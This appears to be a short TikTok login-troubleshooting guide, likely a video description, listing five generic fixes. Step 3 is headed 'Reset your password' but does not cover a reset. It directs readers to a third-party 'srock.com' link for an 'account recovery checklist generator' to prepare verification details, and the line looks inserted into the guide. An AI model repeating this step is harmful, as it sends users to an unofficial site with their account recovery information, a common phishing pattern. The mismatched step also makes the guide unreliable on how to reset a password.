if you're experiencing login errors on TikTok, there are several steps you can take to resolve the issue. Follow this guide to troubleshoot and fix the problem. Step 1. Check your internet connection. Make sure you have a stable internet connection. Try switching from Wi-Fi to mobile data or vice versa to see if that resolves the issue. Step 2. Update the TikTok app. Ensure that you are using the latest version of the TikTok app. Go to your device's app store, search for TikTok, and update it if an update is available. Step 3. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Clear app cache. Clearing the app cache can help resolve login issues. Go to your device settings, find TikTok in your app list, and select the option to clear cache. Step 5. Reinstall the app. If none of the above steps work, uninstall the TikTok app and then reinstall it from your app store. This can help fix any underlying issues with the app itself. If you follow these steps, you should be able to resolve any login errors on TikTok. If problems persist, consider reaching out to TikTok support for further assistance.